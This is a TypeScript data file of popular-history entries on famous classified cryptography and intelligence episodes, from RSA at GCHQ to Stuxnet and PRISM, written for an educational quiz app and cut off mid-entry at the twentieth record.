// ── Vault Registry — Humanity's Greatest Classified Secrets ──────────

export interface VaultEntry {
  id: string;
  rank: number;
  name: string;
  codename?: string;
  classifiedYear: string;
  declassifiedYear: string;
  agency: string;
  field: string;
  domain: string;
  domainEmoji: string;
  summary: string;
  fullStory: string;
  keyFigures: string[];
  significance: string;
  legacy: string;
  /** Related quiz topic slug */
  relatedTopic: string;
  /** Secrecy rating 1–10 */
  secrecyLevel: number;
  /** Impact on modern world 1–10 */
  impact: number;
}

export const VAULT_ENTRIES: VaultEntry[] = [
  {
    id: 'gchq-rsa',
    rank: 1,
    name: 'The GCHQ RSA Equations',
    codename: 'Non-Secret Encryption',
    classifiedYear: '1973',
    declassifiedYear: '1997',
    agency: 'GCHQ',
    field: 'Public-Key Cryptography',
    domain: 'Cryptography',
    domainEmoji: '🔐',
    summary: 'Clifford Cocks invented RSA encryption at GCHQ in 1973 — four years before Rivest, Shamir, and Adleman published it publicly.',
    fullStory: 'In the summer of 1973, GCHQ mathematician Clifford Cocks was briefed on a problem posed by his colleague James Ellis: could two parties establish a shared secret over an insecure channel without prior contact? Cocks solved it the same afternoon by recognizing that the mathematical hardness of factoring the product of two large primes could serve as a trapdoor function. He wrote a classified internal memo describing what is now known as RSA encryption. Malcolm Williamson independently invented the equivalent of Diffie-Hellman key exchange the following year. All three discoveries were immediately classified. GCHQ was reportedly approached after Diffie and Hellman published their 1976 paper and Rivest, Shamir, and Adleman published RSA in 1978, but declined to acknowledge priority. James Ellis, who had conceived the foundational idea of "non-secret encryption" in 1970, died on November 25, 1997 — exactly 23 days before the announcement that would have given him public credit.',
    keyFigures: ['Clifford Cocks', 'James Ellis', 'Malcolm Williamson'],
    significance: 'The inventors of the mathematical foundations of internet security died in public obscurity, having been forbidden for 24 years to claim their own discovery.',
    legacy: 'RSA secures every HTTPS connection, digital signature, and cryptocurrency transaction on Earth. The irony: the man who invented it couldn\'t tell anyone.',
    relatedTopic: 'cryptography',
    secrecyLevel: 9,
    impact: 10,
  },
  {
    id: 'des-sbox',
    rank: 2,
    name: 'DES S-Box Differential Resistance',
    codename: 'IBM T-Attack',
    classifiedYear: '1974',
    declassifiedYear: '1994',
    agency: 'NSA / IBM',
    field: 'Block Cipher Design',
    domain: 'Cryptography',
    domainEmoji: '🔐',
    summary: 'IBM discovered differential cryptanalysis in 1974 and engineered DES S-boxes to resist it — then the NSA asked them to keep it secret for 16 years.',
    fullStory: 'In 1974, IBM\'s cryptography team — led by Horst Feistel and including Walter Tuchman and Don Coppersmith — discovered what they called "differential cryptanalysis": a method of attacking block ciphers by analyzing how specific differences in plaintext pairs produce differences in ciphertext pairs. They applied this to design the S-boxes (substitution tables) in DES such that differential characteristics had uniformly low probability, making the cipher resistant to an attack that the public cryptography community would not independently discover for sixteen years. The NSA asked IBM to keep the technique classified. IBM agreed. In 1990, Israeli cryptographers Eli Biham and Adi Shamir independently discovered differential cryptanalysis and published it. Don Coppersmith published IBM\'s original design criteria in 1994, confirming the S-boxes were intentionally engineered to resist the attack.',
    keyFigures: ['Don Coppersmith', 'Horst Feistel', 'Eli Biham', 'Adi Shamir'],
    significance: 'The most consequential deliberate suppression of a mathematical technique in civilian cryptography history.',
    legacy: 'Differential cryptanalysis became a foundational tool for evaluating all modern ciphers. AES candidates were specifically tested against it.',
    relatedTopic: 'cybersecurity',
    secrecyLevel: 8,
    impact: 9,
  },
  {
    id: 'skipjack',
    rank: 3,
    name: 'The Skipjack Block Cipher',
    codename: 'Clipper Chip',
    classifiedYear: '1987',
    declassifiedYear: '1998',
    agency: 'NSA',
    field: 'Block Cipher Design',
    domain: 'Cryptography',
    domainEmoji: '🔐',
    summary: 'The only NSA-designed block cipher ever publicly released. An 80-bit key, 32-round Feistel network deployed in the controversial Clipper chip.',
    fullStory: 'Skipjack was developed by the NSA around 1987 and deployed in the Clipper chip — the government\'s controversial key-escrow encryption system for telephone communications. The NSA refused to publish the algorithm, allowing only a panel of five civilian cryptographers to review it under non-disclosure. They pronounced it sound. The public cryptography community was deeply skeptical: any algorithm whose security relied on secrecy rather than mathematical rigor violated Kerckhoffs\'s principle. The Clipper chip program collapsed largely because no one would trust a classified cipher from an intelligence agency. Under pressure, NSA declassified Skipjack on June 24, 1998. Within one day, Biham and Shamir had found an attack against 16 of 32 rounds. Within months, they extended it to 31 of 32 rounds. The declassification revealed that Skipjack\'s structure dated to building blocks developed as early as 1940 — confirming a classified 40+ year cryptographic research program.',
    keyFigures: ['NSA Cryptographic Division', 'Eli Biham', 'Adi Shamir'],
    significance: 'Demonstrated that classified algorithms violate Kerckhoffs\'s principle and that government backdoors erode public trust in cryptographic standards.',
    legacy: 'The Clipper chip\'s failure established the precedent that public cryptographic standards must be openly reviewed. This principle directly shaped AES selection.',
    relatedTopic: 'cybersecurity',
    secrecyLevel: 9,
    impact: 8,
  },
  {
    id: 'enigma',
    rank: 4,
    name: 'The Enigma Decryption',
    codename: 'Ultra',
    classifiedYear: '1940',
    declassifiedYear: '1974',
    agency: 'GC&CS (Bletchley Park)',
    field: 'Cryptanalysis',
    domain: 'Cryptography',
    domainEmoji: '🔐',
    summary: 'Alan Turing and the Bletchley Park team broke the Enigma cipher, shortening WWII by an estimated 2 years. Kept secret for 29 years after the war ended.',
    fullStory: 'Building on Polish breakthroughs by Marian Rejewski, the British codebreakers at Bletchley Park — led by Alan Turing and Gordon Welchman — developed the Bombe, an electromechanical device that exploited the Enigma machine\'s mathematical weaknesses. The key insight was that Enigma never encrypted a letter as itself, providing a critical constraint. Turing\'s probabilistic approach (Banburismus) reduced the search space for naval Enigma, enabling the Allies to read U-boat communications and win the Battle of the Atlantic. Churchill called the Bletchley Park staff "the geese that laid the golden egg and never cackled." The entire operation — codenamed Ultra — remained classified until 1974, when F.W. Winterbotham published "The Ultra Secret." For 29 years after the war, the thousands who had worked at Bletchley Park kept total silence.',
    keyFigures: ['Alan Turing', 'Gordon Welchman', 'Marian Rejewski', 'Dilly Knox'],
    significance: 'Historians estimate Ultra shortened WWII by 2 years and saved 14 million lives. Turing\'s theoretical work on computability directly led to modern computer science.',
    legacy: 'The conceptual foundation of modern computing was born from wartime cryptanalysis. Turing\'s persecution and death remain a profound moral stain on British history.',
    relatedTopic: 'cryptography',
    secrecyLevel: 10,
    impact: 10,
  },
  {
    id: 'venona',
    rank: 5,
    name: 'The VENONA Decryptions',
    codename: 'VENONA / BRIDE',
    classifiedYear: '1943',
    declassifiedYear: '1995',
    agency: 'US Army SIS / NSA',
    field: 'One-Time Pad Cryptanalysis',
    domain: 'Cryptography',
    domainEmoji: '🔐',
    summary: 'The US secretly broke Soviet one-time pad messages — supposedly unbreakable — by exploiting key reuse. Kept classified for 52 years.',
    fullStory: 'In 1943, the US Army\'s Signal Intelligence Service began a secret program to decrypt Soviet diplomatic communications. One-time pads are theoretically unbreakable (Shannon proved this in 1949), but wartime Soviet manufacturing errors caused some key pages to be duplicated and reused. Cryptanalyst Meredith Gardner exploited these "depth" collisions, eventually decrypting roughly 3,000 messages that revealed the scope of Soviet espionage in the Manhattan Project. VENONA identified Klaus Fuchs, the Rosenbergs, and dozens of other spies. The program was so secret that even President Truman was reportedly not briefed. VENONA was not declassified until 1995 — 52 years after it began — making it one of the longest-running classified intelligence programs in US history.',
    keyFigures: ['Meredith Gardner', 'Cecil Phillips', 'Gene Grabeel'],
    significance: 'Proved that even "perfect" cryptographic systems fail when implementation is flawed. The gap between theoretical security and operational security remains the central problem of cryptography.',
    legacy: 'VENONA reshaped Cold War historiography. The decryptions definitively settled decades of debate about the extent of Soviet espionage in the US.',
    relatedTopic: 'cryptography',
    secrecyLevel: 10,
    impact: 9,
  },
  {
    id: 'dual-ec',
    rank: 6,
    name: 'Dual_EC_DRBG Backdoor',
    codename: 'BULLRUN',
    classifiedYear: '2004',
    declassifiedYear: '2013',
    agency: 'NSA',
    field: 'Random Number Generation',
    domain: 'Cryptography',
    domainEmoji: '🔐',
    summary: 'The NSA inserted a mathematical backdoor into a NIST-standardized random number generator, undermining global cryptographic infrastructure.',
    fullStory: 'In 2004, NIST published Special Publication 800-90A, standardizing four pseudorandom number generators. One of them — Dual_EC_DRBG — was championed by the NSA. In 2007, cryptographers Dan Shumow and Niels Ferguson demonstrated at a rump session of CRYPTO that the algorithm contained what appeared to be a backdoor: the relationship between two elliptic curve points (P and Q) could allow anyone who knew the discrete logarithm between them to predict all future outputs. Despite this, Dual_EC remained a NIST and ISO standard. RSA Security made it the default in their BSAFE library (reportedly after receiving $10 million from the NSA). In 2013, Edward Snowden\'s documents revealed the NSA\'s BULLRUN program, which sought to "insert vulnerabilities into commercial encryption systems." NIST withdrew the standard. RSA Security advised customers to stop using it.',
    keyFigures: ['Dan Shumow', 'Niels Ferguson', 'Edward Snowden'],
    significance: 'The most significant known case of a government deliberately compromising a public cryptographic standard. Shattered trust in NIST standardization processes.',
    legacy: 'Led to complete reform of NIST\'s cryptographic standardization process. The post-quantum cryptography competition was explicitly designed with transparency to prevent a repeat.',
    relatedTopic: 'cybersecurity',
    secrecyLevel: 9,
    impact: 10,
  },
  {
    id: 'manhattan-implosion',
    rank: 7,
    name: 'The Implosion Lens Equations',
    codename: 'Manhattan Project — Fat Man',
    classifiedYear: '1944',
    declassifiedYear: '1960s (partial)',
    agency: 'Los Alamos / US DoE',
    field: 'Shaped Charge Physics',
    domain: 'Physics',
    domainEmoji: '⚛️',
    summary: 'The mathematical equations for spherical implosion lenses that compress plutonium to supercriticality — the hardest engineering problem of the atomic age.',
    fullStory: 'The gun-type uranium bomb (Little Boy) was straightforward. The plutonium bomb (Fat Man) required solving a far harder problem: simultaneously detonating 32 explosive lenses to produce a perfectly spherical converging shockwave that would compress a plutonium core from subcritical to supercritical in microseconds. The mathematics — hydrodynamic equations governing converging detonation waves in heterogeneous explosive charges — was solved by John von Neumann, who also co-invented the Monte Carlo method at Los Alamos specifically to numerically simulate the implosion process. The lens equations remained classified for decades because they represent the core "secret" of nuclear weapons: the geometry of implosion.',
    keyFigures: ['John von Neumann', 'Seth Neddermeyer', 'George Kistiakowsky'],
    significance: 'Von Neumann\'s work at Los Alamos led to both nuclear weapons and the birth of computational science. The Monte Carlo method, invented to model implosion, now underpins all of computational statistics.',
    legacy: 'Every thermonuclear weapon, every Monte Carlo simulation in finance, every MCMC chain in Bayesian ML — all trace lineage to classified equations written in a New Mexico desert.',
    relatedTopic: 'quantum-mechanics',
    secrecyLevel: 10,
    impact: 10,
  },
  {
    id: 'public-key-knapsack',
    rank: 8,
    name: 'NSA Suite A Algorithms',
    codename: 'Suite A',
    classifiedYear: '~1960s',
    declassifiedYear: 'Still classified',
    agency: 'NSA',
    field: 'Classified Cryptographic Algorithms',
    domain: 'Cryptography',
    domainEmoji: '🔐',
    summary: 'The NSA\'s Suite A — a family of classified algorithms for TOP SECRET and above — has never been publicly described. We know they exist. We know nothing else.',
    fullStory: 'The NSA maintains two tiers of cryptographic algorithms: Suite B (public algorithms like AES-256, SHA-384, ECDSA P-384) for SECRET and below, and Suite A for TOP SECRET/SCI and above. Suite A algorithms have never been publicly described — not their names, not their structures, not their key sizes, not their mathematical foundations. The only public knowledge is that they exist, that they are implemented in Type 1 cryptographic equipment, and that they require clearance to access. In 2016, the NSA announced it was transitioning away from Suite B\'s elliptic curve algorithms (due to quantum computing concerns), raising the question of what Suite A has used all along — and whether the NSA\'s classified mathematicians solved the post-quantum problem decades before NIST began its public competition.',
    keyFigures: ['Unknown — NSA cryptographers with no public identity'],
    significance: 'Suite A represents the outer boundary of known unknown cryptography — algorithms that protect the most sensitive intelligence on Earth, designed by mathematicians who cannot publish.',
    legacy: 'The existence of Suite A is a permanent reminder that the publicly known frontier of cryptography may be decades behind the classified frontier.',
    relatedTopic: 'cryptography',
    secrecyLevel: 10,
    impact: 8,
  },
  // ── 4 Older Classified Secrets ──────────────────────────────
  {
    id: 'lorenz-colossus',
    rank: 9,
    name: 'The Lorenz Cipher & Colossus',
    codename: 'Tunny / Fish',
    classifiedYear: '1941',
    declassifiedYear: '2000',
    agency: 'GC&CS (Bletchley Park)',
    field: 'Automated Cryptanalysis',
    domain: 'Cryptography',
    domainEmoji: '🔐',
    summary: 'The world\'s first programmable electronic computer — Colossus — was built in 1943 to break the Lorenz cipher used by Hitler\'s High Command. Its existence was classified for 57 years.',
    fullStory: 'While Enigma encrypted tactical battlefield messages, the Lorenz SZ40/42 cipher machine encrypted Hitler\'s strategic communications with his generals. The cipher used 12 rotors (vs Enigma\'s 3-4) producing a key stream XORed with the Baudot-coded plaintext. Mathematician Bill Tutte reverse-engineered the entire Lorenz machine\'s logical structure from intercepted ciphertext alone — without ever seeing the physical device. To break messages in operational time, Tommy Flowers built Colossus at the Post Office Research Station: a 1,500-valve electronic machine that could process 5,000 characters per second. Ten Colossus machines were built by 1945. After the war, Churchill ordered eight destroyed and the remaining two moved to GCHQ, where they operated until 1960. Their existence was classified until 2000. The entire history of computing was rewritten — ENIAC (1945) was not the first electronic computer.',
    keyFigures: ['Bill Tutte', 'Tommy Flowers', 'Max Newman', 'Ralph Tester'],
    significance: 'The first electronic programmable computer was built 2 years before ENIAC, but the world didn\'t know for 57 years. The entire origin story of computing was wrong.',
    legacy: 'Flowers received £1,000 for his invention and died in relative obscurity. Tutte\'s feat of reverse-engineering an unseen machine from pure mathematics is considered one of the greatest intellectual achievements of the 20th century.',
    relatedTopic: 'cryptography',
    secrecyLevel: 10,
    impact: 10,
  },
  {
    id: 'purple-cipher',
    rank: 10,
    name: 'Breaking Japan\'s Purple Cipher',
    codename: 'MAGIC',
    classifiedYear: '1939',
    declassifiedYear: '1946',
    agency: 'US Army SIS',
    field: 'Electromechanical Cryptanalysis',
    domain: 'Cryptography',
    domainEmoji: '🔐',
    summary: 'William Friedman\'s team reverse-engineered Japan\'s "unbreakable" Purple diplomatic cipher machine without ever seeing it — building a functional replica from cryptanalysis alone.',
    fullStory: 'In 1939, Japan deployed a new cipher machine for its highest-level diplomatic communications, which the US codenamed "Purple." William Friedman, head of the Army\'s Signal Intelligence Service, led a team that spent 18 months analyzing intercepted ciphertext. They deduced that Purple used telephone stepping switches (not rotors like Enigma) to create its substitution cipher. The team built a working replica — the "Purple analog" — that could decrypt Japanese diplomatic traffic in real time. The intelligence product, codenamed MAGIC, gave US leaders advance knowledge of Japanese diplomatic positions. The stress of the work caused Friedman to suffer a nervous breakdown. MAGIC intelligence was so sensitive that knowledge of Purple\'s break was restricted to fewer than a dozen people. The irony: the US knew Japan\'s negotiating positions at every stage leading to Pearl Harbor, yet the intelligence was not actionable because sharing it would have revealed the source.',
    keyFigures: ['William Friedman', 'Frank Rowlett', 'Genevieve Grotjan', 'Abraham Sinkov'],
    significance: 'Genevieve Grotjan\'s discovery of the mathematical pattern that cracked Purple is one of the greatest individual codebreaking insights in history — and she received almost no credit for decades.',
    legacy: 'Friedman is now recognized as the father of American cryptanalysis. The MAGIC/Pearl Harbor controversy remains one of the most debated intelligence failures in history.',
    relatedTopic: 'cryptography',
    secrecyLevel: 9,
    impact: 9,
  },
  {
    id: 'navajo-code',
    rank: 11,
    name: 'The Navajo Code Talkers',
    codename: 'Arizona / New Mexico',
    classifiedYear: '1942',
    declassifiedYear: '1968',
    agency: 'US Marine Corps',
    field: 'Linguistic Cryptography',
    domain: 'Cryptography',
    domainEmoji: '🔐',
    summary: 'The only military cipher in modern history never broken — a code built on the unwritten Navajo language, used across the Pacific Theater in WWII.',
    fullStory: 'In 1942, Philip Johnston, a civil engineer who had grown up on the Navajo reservation, proposed using Navajo as a military communication code. The Marine Corps recruited 29 Navajo men who developed a dual-layered system: common military terms were assigned Navajo words (e.g., "tank" = "turtle"), while spelling out uncommon words used a Navajo alphabet where each letter had multiple possible encodings. This created a code that was simultaneously fast enough for real-time battlefield communication and complex enough to resist cryptanalysis. Japanese intelligence, which had broken US Army codes, never made any progress against the Navajo transmissions. Over 400 Navajo Code Talkers served in every major Pacific engagement from Guadalcanal to Iwo Jima. Major Howard Connor declared: "Were it not for the Navajos, the Marines would never have taken Iwo Jima." The program was declassified in 1968, but the Code Talkers received no recognition until 2001.',
    keyFigures: ['Chester Nez', 'Carl Gorman', 'Philip Johnston', 'Major Howard Connor'],
    significance: 'The only unbroken code in modern military history — not because of mathematical complexity, but because it exploited the irreducible complexity of human language.',
    legacy: 'The Code Talkers waited 26 years for declassification and 59 years for the Congressional Gold Medal. Their story remains one of the most powerful examples of marginalized people defending the nation that marginalized them.',
    relatedTopic: 'cryptography',
    secrecyLevel: 7,
    impact: 9,
  },
  {
    id: 'room-40',
    rank: 12,
    name: 'Room 40 & The Zimmermann Telegram',
    codename: 'Room 40',
    classifiedYear: '1914',
    declassifiedYear: '1931',
    agency: 'British Admiralty',
    field: 'Diplomatic Cryptanalysis',
    domain: 'Cryptography',
    domainEmoji: '🔐',
    summary: 'Britain\'s secret codebreaking unit decrypted a German telegram proposing a military alliance with Mexico against the US — and it changed the course of WWI.',
    fullStory: 'In January 1917, Room 40 — the British Admiralty\'s codebreaking office — intercepted and decrypted a telegram from German Foreign Secretary Arthur Zimmermann to the German ambassador in Mexico. It proposed that if the US entered WWI, Mexico should attack the United States, with German support, to recover Texas, New Mexico, and Arizona. The British faced a dilemma: revealing the telegram would prove they were reading German diplomatic traffic. They devised an elaborate cover story, claiming the telegram was obtained by a spy in Mexico City. When published on March 1, 1917, the telegram caused a firestorm of public outrage in the US. Zimmermann himself confirmed its authenticity, eliminating any doubt. The US declared war on Germany five weeks later. Room 40 had been operational since 1914, employing academics, linguists, and crossword enthusiasts — establishing the template that Bletchley Park would later follow on a massive scale.',
    keyFigures: ['Nigel de Grey', 'William Montgomery', 'Admiral Reginald Hall'],
    significance: 'A single decrypted telegram brought the United States into World War I, fundamentally altering the outcome of the war and the trajectory of the 20th century.',
    legacy: 'Room 40 established the precedent for signals intelligence as a strategic weapon. Its organizational model — academics working in secret for the state — became the blueprint for Bletchley Park, NSA, and GCHQ.',
    relatedTopic: 'cryptography',
    secrecyLevel: 8,
    impact: 10,
  },
  // ── 4 Modern Classified Secrets ──────────────────────────────
  {
    id: 'stuxnet',
    rank: 13,
    name: 'Stuxnet — The First Cyber Weapon',
    codename: 'Olympic Games',
    classifiedYear: '~2005',
    declassifiedYear: '2010 (discovered)',
    agency: 'NSA / Unit 8200',
    field: 'Cyber Warfare',
    domain: 'Cybersecurity',
    domainEmoji: '🛡️',
    summary: 'The first known cyber weapon — a worm that physically destroyed Iran\'s nuclear centrifuges by silently altering their spin speeds while reporting normal telemetry.',
    fullStory: 'Stuxnet was a 500KB Windows worm discovered in 2010 that targeted Siemens SCADA systems controlling Iran\'s uranium enrichment centrifuges at Natanz. It exploited four zero-day vulnerabilities simultaneously — an unprecedented level of sophistication. Once inside the air-gapped facility (likely via infected USB drives), Stuxnet intercepted commands to the Siemens S7-315/417 PLCs controlling the centrifuge motors. It periodically altered rotor speeds between 1,410 Hz and 2 Hz (normal: 1,064 Hz), causing mechanical stress and failure, while replaying normal telemetry to operators — a man-in-the-middle attack on physical reality. An estimated 984 centrifuges were destroyed. The worm was designed to spread silently and self-delete after a set date. Its escape into the wild was reportedly accidental. Journalists David Sanger and Kim Zetter traced it to a joint US-Israeli operation codenamed "Olympic Games," initiated under Bush and expanded under Obama.',
    keyFigures: ['Ralph Langner', 'Sergey Ulasen', 'David Sanger', 'Kim Zetter'],
    significance: 'The first act of cyber warfare that caused physical destruction. It proved that software could be weaponized to destroy critical infrastructure without conventional military action.',
    legacy: 'Stuxnet opened Pandora\'s box. Every nation now develops offensive cyber capabilities. The line between espionage and act of war in cyberspace remains undefined in international law.',
    relatedTopic: 'cybersecurity',
    secrecyLevel: 9,
    impact: 10,
  },
  {
    id: 'heartbleed',
    rank: 14,
    name: 'Heartbleed — The Internet\'s Heart Attack',
    codename: 'CVE-2014-0160',
    classifiedYear: '2012 (introduced)',
    declassifiedYear: '2014 (disclosed)',
    agency: 'Open Source / NSA (suspected prior knowledge)',
    field: 'TLS Implementation Vulnerability',
    domain: 'Cybersecurity',
    domainEmoji: '🛡️',
    summary: 'A single missing bounds check in OpenSSL exposed the private keys, passwords, and encrypted communications of 17% of the internet\'s secure servers for 27 months.',
    fullStory: 'On December 31, 2011, German developer Robin Seggelmann submitted a patch to OpenSSL implementing the TLS Heartbeat extension (RFC 6520). A missing bounds check in the heartbeat response allowed an attacker to read up to 64KB of server memory per request — including private keys, session cookies, passwords, and any data in process memory. The bug went live in OpenSSL 1.0.1 on March 14, 2012. For 27 months, any of the ~500,000 affected servers could be silently exfiltrated with no trace in server logs. Google security researcher Neel Mehta independently discovered the bug in April 2014, reporting it to OpenSSL. Codenomicon independently found it and gave it the name "Heartbleed" with a logo and website — pioneering the era of branded vulnerabilities. Bloomberg reported (and the NSA denied) that the NSA had known about and exploited Heartbleed for two years before public disclosure. The bug was caused by a single missing `if (payload + padding > length) return;` check.',
    keyFigures: ['Robin Seggelmann', 'Neel Mehta', 'Bodo Möller', 'Codenomicon team'],
    significance: 'Demonstrated that the security of the entire internet depended on a handful of underfunded open-source maintainers. One missing bounds check compromised half a million servers.',
    legacy: 'Heartbleed led directly to the creation of the Linux Foundation\'s Core Infrastructure Initiative (now OpenSSF), which funds critical open-source security projects. It proved that "given enough eyeballs, all bugs are shallow" was dangerously optimistic.',
    relatedTopic: 'cybersecurity',
    secrecyLevel: 7,
    impact: 9,
  },
  {
    id: 'shattered',
    rank: 15,
    name: 'SHAttered — Breaking SHA-1',
    codename: 'SHAttered',
    classifiedYear: '2013 (research begins)',
    declassifiedYear: '2017 (published)',
    agency: 'Google / CWI Amsterdam',
    field: 'Collision Attacks on Hash Functions',
    domain: 'Cryptography',
    domainEmoji: '🔐',
    summary: 'Google produced the first real-world SHA-1 collision — two different PDF files with the same hash — proving a foundational internet security primitive was broken.',
    fullStory: 'SHA-1, designed by the NSA in 1995, was the most widely used cryptographic hash function for digital signatures, certificates, and version control. In 2005, Xiaoyun Wang published theoretical attacks reducing SHA-1\'s collision resistance from the ideal 2^80 to 2^69 operations. The cryptography community warned of deprecation, but migration was slow — SHA-1 was embedded everywhere. In 2017, researchers Marc Stevens (CWI Amsterdam) and Elie Bursztein (Google) performed the first practical collision attack: they created two different PDF documents with identical SHA-1 hashes. The attack required 9,223,372,036,854,775,808 (2^63) SHA-1 computations — equivalent to 6,500 years of single-CPU computation or 110 years of single-GPU computation. Google donated the equivalent cloud computing time. The "SHAttered" attack was 100,000 times faster than brute force. Within hours of publication, Linus Torvalds (whose Git relied on SHA-1) acknowledged the need to transition.',
    keyFigures: ['Marc Stevens', 'Elie Bursztein', 'Xiaoyun Wang', 'Pierre Karpman'],
    significance: 'Proved that theoretical cryptographic attacks eventually become practical. The gap between "theoretically broken" and "practically broken" is just time and compute.',
    legacy: 'Forced the migration of billions of digital certificates, Git repositories, and signing systems to SHA-256. Established that cryptographic deprecation must happen proactively, not reactively.',
    relatedTopic: 'cryptography',
    secrecyLevel: 5,
    impact: 8,
  },
  {
    id: 'prism-xkeyscore',
    rank: 16,
    name: 'PRISM & XKeyscore — Mass Surveillance',
    codename: 'PRISM / XKeyscore',
    classifiedYear: '2007',
    declassifiedYear: '2013 (Snowden)',
    agency: 'NSA / Five Eyes',
    field: 'Signals Intelligence Infrastructure',
    domain: 'Cybersecurity',
    domainEmoji: '🛡️',
    summary: 'Edward Snowden revealed that the NSA had built systems to collect and search virtually all internet communications worldwide — including from US tech companies\' own servers.',
    fullStory: 'In June 2013, NSA contractor Edward Snowden leaked thousands of classified documents to journalists Glenn Greenwald, Laura Poitras, and Barton Gellman. The documents revealed two programs of unprecedented scope. PRISM: established in 2007 under Section 702 of FISA, allowed the NSA to collect data directly from the servers of nine major US tech companies — Microsoft, Google, Yahoo, Facebook, Apple, AOL, Skype, YouTube, and PalTalk. Companies disputed the "direct access" characterization but acknowledged providing data under legal compulsion. XKeyscore: a search system that allowed NSA analysts to search through vast databases of emails, browsing history, and chat logs with no prior authorization. Training materials boasted it could intercept "nearly everything a typical user does on the internet." The Five Eyes alliance (US, UK, Canada, Australia, New Zealand) shared access. The legal framework relied on a secret interpretation of Section 215 of the Patriot Act that the FISA Court had approved in classified rulings.',
    keyFigures: ['Edward Snowden', 'Glenn Greenwald', 'Laura Poitras', 'Barton Gellman'],
    significance: 'Revealed the largest mass surveillance apparatus in human history, operating with secret legal authority and minimal oversight, fundamentally challenging the relationship between security and privacy.',
    legacy: 'Led to the USA FREEDOM Act (2015), Apple\'s encryption-by-default on iPhones, Signal\'s mainstream adoption, and a permanent global debate about surveillance vs. security. Snowden remains in Russia.',
    relatedTopic: 'cybersecurity',
    secrecyLevel: 10,
    impact: 10,
  },
  // ── Epic & Funny Additions ──────────────────────────────────
  {
    id: 'kryptos',
    rank: 17,
    name: 'CIA\'s Kryptos Sculpture — Unsolved Since 1990',
    codename: 'K4',
    classifiedYear: '1990',
    declassifiedYear: 'Still unsolved',
    agency: 'CIA',
    field: 'Steganography & Puzzle Ciphers',
    domain: 'Cryptography',
    domainEmoji: '🗿',
    summary: 'A sculpture in the CIA courtyard contains four encrypted messages. Three have been solved. The fourth has defeated every cryptographer on Earth for 34 years.',
    fullStory: 'In 1990, artist Jim Sanborn installed "Kryptos" — a copper scroll sculpture — in the courtyard of CIA headquarters in Langley, Virginia. It contains 1,735 ciphertext characters divided into four sections. K1, K2, and K3 were solved by the mid-1990s using Vigenère and transposition ciphers. K4 — the final 97 characters — has remained unsolved for over three decades despite the combined efforts of NSA cryptanalysts, CIA analysts, amateur codebreakers, and AI systems. Sanborn has released four clues over the years: "BERLIN" (2010), "CLOCK" (2014), "NORTHEAST" (2020), and most recently confirmed the plaintext contains the word "EASTNORTHEAST." The sculpture is the only artwork at CIA headquarters and has become the most famous unsolved code in the world. Sanborn has said the full solution contains a riddle within a riddle, and he has given the answer to CIA director William Webster in a sealed envelope.',
    keyFigures: ['Jim Sanborn', 'Ed Scheidt', 'William Webster', 'Elonka Dunin'],
    significance: 'The most famous unsolved cipher in the world sits in the courtyard of the world\'s most powerful intelligence agency — taunting them daily.',
    legacy: 'Kryptos inspired a subplot in Dan Brown\'s "The Lost Symbol" and has spawned a global community of dedicated solvers. Sanborn, now in his 70s, has hinted he may reveal the answer before he dies.',
    relatedTopic: 'cryptography',
    secrecyLevel: 8,
    impact: 6,
  },
  {
    id: 'tempest',
    rank: 18,
    name: 'TEMPEST — Spying Through Walls via Electromagnetic Emissions',
    codename: 'TEMPEST',
    classifiedYear: '1956',
    declassifiedYear: '1985 (partially)',
    agency: 'NSA',
    field: 'Signals Intelligence / Side-Channel',
    domain: 'Cybersecurity',
    domainEmoji: '🛡️',
    summary: 'The NSA discovered that every electronic device leaks electromagnetic radiation that can be intercepted to reconstruct what\'s on screen, what\'s being typed, or what\'s being computed — from hundreds of meters away.',
    fullStory: 'In 1956, the NSA began research into "compromising emanations" — the fact that all electronic equipment radiates electromagnetic signals that can be intercepted and decoded. CRT monitors emit radiation that can be reconstructed into a copy of the screen image. Keyboards leak timing signals through power lines. Printers emit sounds correlated to the characters being printed. Even the blinking LED on a router can leak data. The NSA developed both the interception techniques and the shielding standards (TEMPEST) to protect against them. The program was so classified that the very name "TEMPEST" was classified — it was initially denied to be an acronym for anything. In 1985, Dutch researcher Wim van Eck independently discovered screen eavesdropping and published it, causing a sensation. The NSA was forced to acknowledge the program partially. To this day, military and intelligence facilities use TEMPEST-rated equipment housed in Faraday cages to prevent emanation leaks.',
    keyFigures: ['Wim van Eck', 'Markus Kuhn', 'NSA COMSEC Division'],
    significance: 'Your computer is broadcasting everything you do via electromagnetic radiation. The NSA knew this for 30 years before anyone else. Every military facility on Earth now uses TEMPEST shielding.',
    legacy: 'Modern side-channel attacks (power analysis, acoustic cryptanalysis, cache timing) are all descendants of TEMPEST research. Your laptop is still leaking — you just don\'t have the equipment to listen.',
    relatedTopic: 'cybersecurity',
    secrecyLevel: 9,
    impact: 8,
  },
  {
    id: 'soviet-math',
    rank: 19,
    name: 'The Soviet Cybernetics Ban — When Math Was Political',
    codename: 'None — banned openly',
    classifiedYear: '1950',
    declassifiedYear: '1961',
    agency: 'Soviet Academy of Sciences',
    field: 'Computer Science / Cybernetics',
    domain: 'Computer Science',
    domainEmoji: '💻',
    summary: 'The Soviet Union banned cybernetics as a "bourgeois pseudoscience" from 1950 to 1961 — setting their computer science back by a decade and arguably losing them the Cold War.',
    fullStory: 'In 1950, a Soviet philosophical journal published an article declaring cybernetics — the mathematical study of communication and control in machines and living beings — a "reactionary pseudoscience" serving the interests of American imperialism. Norbert Wiener\'s 1948 book "Cybernetics" was banned. Information theory, systems theory, and early computer science were labeled ideologically suspect. Soviet mathematicians who worked on these topics were forced to disguise their research under acceptable labels like "automatic control theory." The ban persisted until 1961, when Khrushchev\'s government reversed course and declared cybernetics the key to economic planning. By then, the US had a decade head start in computer architecture, programming languages, and networking. The Soviet Union never recovered the gap. The entire history of computing might have been different had Soviet mathematicians like Andrey Kolmogorov and Sergei Sobolev been free to collaborate with Western researchers during the 1950s.',
    keyFigures: ['Norbert Wiener', 'Andrey Kolmogorov', 'Anatoly Kitov', 'Aleksei Lyapunov'],
    significance: 'The most expensive ideological mistake in the history of science: banning an entire mathematical discipline because it originated in the wrong country.',
    legacy: 'A permanent cautionary tale about politicizing science. When governments decide which mathematics is ideologically acceptable, everyone loses.',
    relatedTopic: 'cybersecurity',
    secrecyLevel: 4,
    impact: 9,
  },
  {
    id: 'area51-oxcart',
    rank: 20,
    name: 'Area 51 & The OXCART Program',
    codename: 'OXCART / A-12',
    classifiedYear: '1957',
    declassifiedYear: '2007',
    agency: 'CIA / Lockheed Skunk Works',
    field: 'Stealth Aviation',
    domain: 'Engineering',
    domainEmoji: '🛩️',
